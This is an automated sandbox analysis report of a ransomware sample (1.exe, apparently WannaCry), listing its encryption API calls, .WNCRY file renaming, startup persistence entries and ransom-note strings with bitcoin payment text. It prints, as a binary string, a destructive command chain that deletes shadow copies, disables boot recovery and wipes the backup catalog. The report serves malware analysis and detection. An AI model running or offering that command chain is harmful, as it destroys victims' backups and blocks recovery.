Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:18.0.0
Analysis ID:268923
Start time:16:34:45
Joe Sandbox Product:Cloud
Start date:12.05.2017
Overall analysis duration:0h 8m 16s
Report type:full
Sample file name:1.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
Detection:MAL
Classification:mal68.rans.winEXE@18/171@0/0
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 22
  • Number of non-executed functions: 28
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): slui.exe, WmiApSrv.exe, WatAdminSvc.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.


Detection

StrategyScoreRangeReportingDetection
Threshold680 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook



Signature Overview

Click to jump to signature section


Operating System Destruction:

barindex
Mass deletion, destroys many filesShow sources
Source: c:\1.exeFile deleted: Number of file deletion 1001 exceeds threshold 400

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\1.exeCode function: 0_2_0040182C CryptAcquireContextA,0_2_0040182C
Source: C:\1.exeCode function: 0_2_00401861 CryptImportKey,0_2_00401861
Source: C:\1.exeCode function: 0_2_004018F9 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,0_2_004018F9
Source: C:\1.exeCode function: 0_2_004018B9 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_004018B9
Source: C:\1.exeCode function: 0_2_004019E1 EnterCriticalSection,strrchr,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,memcpy,0_2_004019E1

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\1.exeCode function: 0_2_00401861 CryptImportKey,0_2_00401861
Source: C:\1.exeCode function: 0_2_004018F9 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,0_2_004018F9
Deletes shadow drive data (may be related to ransomware)Show sources
Source: 1.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: 1.exeBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d
Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)Show sources
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Pictures\Sample Pictures\Desert.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Pictures\Sample Pictures\Jellyfish.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Pictures\Sample Pictures\Koala.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Pictures\Sample Pictures\Lighthouse.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Pictures\Sample Pictures\Penguins.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Pictures\Sample Pictures\Tulips.jpg.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Music\Sample Music\Kalimba.mp3.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Music\Sample Music\Sleep Away.mp3.WNCRY
Source: C:\1.exeFile created: C:\Users\All Users\Documents\My Videos\Sample Videos\Wildlife.wmv.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_SetupUtility.txt.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_wcf_CA_smci_20161220_074953_666.txt.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_NDP462-KB3151800-x86-x64-AllOS-ENU_decompression_log.txt.WNCRY
Source: C:\1.exeFile created: C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Microsoft .NET Framework 4.6.2 Setup_20161220_084829697-MSI_netfx_Full_x86.msi.txt.WNCRY

Networking:

barindex
Found strings which match to known social media urlsShow sources
Source: 1.exeString found in binary or memory: Yahoo equals www.yahoo.com (Yahoo)
Urls found in memory or binary dataShow sources
Source: 1.exeString found in binary or memory: http://
Source: 1.exeString found in binary or memory: http://%d/%d/%d
Source: 1.exeString found in binary or memory: http://www.btcfrog.com/qr/bitcoinpng.php?address=%s
Source: 1.exeString found in binary or memory: http://www.btcfrog.com/qr/bitcoinpng.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: 1.exeString found in binary or memory: https://
Source: 1.exeString found in binary or memory: https://en.wikipedia.org/wiki/bitcoin
Source: 1.exeString found in binary or memory: https://en.wikipedia.org/wiki/bitcoinsend
Source: 1.exeString found in binary or memory: https://www.google.com/search?q=how

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\1.exeCode function: 0_2_00401CE8 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00401CE8
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Startup\~SD2262.tmp
Stores files to the Windows start menu directoryShow sources
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD180E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD181F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD18CC.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD1D95.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD1D96.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD21D9.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD21E9.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\.sol Editor\~SD21EA.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD21FB.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Tablet PC\~SD220C.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD220D.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD220E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD220F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Games\~SD223F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD224F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD2250.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\~SD2251.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Startup\~SD2262.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD25A0.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD25A1.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\.sol Editor\~SD25B2.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD25B3.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD25B4.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD25C4.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD25C5.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Games\~SD25C6.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD25D7.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD25D8.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office\~SD25D9.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Startup\~SD25DA.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD27D8.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD27D9.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\.sol Editor\~SD27E9.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD27EA.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Accessibility\~SD27EB.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\~SD27EC.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Tablet PC\~SD27FD.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Windows PowerShell\~SD27FE.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD27FF.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD2810.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD2811.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD2821.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Games\~SD2822.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD2823.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD2824.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\~SD2854.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Startup\~SD2855.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD2CE7.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD2CE8.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\.sol Editor\~SD2CE9.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD2CEA.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD2CFA.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD2CFB.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SD2D0C.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SD2D0D.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD2D1E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD2D1F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD2D20.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD2D30.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Games\~SD2D31.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD2D32.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD2D33.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office\~SD2D34.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Startup\~SD2D54.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD2EA6.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD2EA7.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\.sol Editor\~SD2EC8.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD2ED8.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Accessibility\~SD2ED9.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\~SD2EDA.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Tablet PC\~SD2EEB.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Windows PowerShell\~SD2EEC.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD2EED.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD2EEE.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD2EFE.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD2F3E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Games\~SD2F3F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD2F50.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD2F51.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\~SD2F52.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\~SD2F62.tmp
